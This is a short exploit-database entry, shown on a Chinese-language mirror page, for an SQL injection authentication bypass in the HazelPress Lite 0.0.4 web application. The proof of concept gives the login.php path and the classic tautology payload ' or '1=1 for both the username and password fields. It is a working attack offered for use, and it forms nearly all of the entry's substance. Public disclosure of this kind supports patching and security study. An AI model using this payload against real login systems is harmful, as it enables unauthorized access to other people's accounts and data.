HazelPress Lite 0.0.4 – Authentication Bypass

• Exploit Database
• 144 阅读

• 作者： cr4wl3r
  日期： 2010-02-28
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/11602/
• 1 2 3 4 5 6 7 8 9

  # HazelPress Lite <= 0.0.4 (Auth Bypass) SQL Injection Vulnerability # By cr4wl3r # Download: http://hazelpress.org/index.php?hazel=downloads   # PoC: [path]/login.php   # Username: &apos; or &apos;1=1 # password: &apos; or &apos;1=1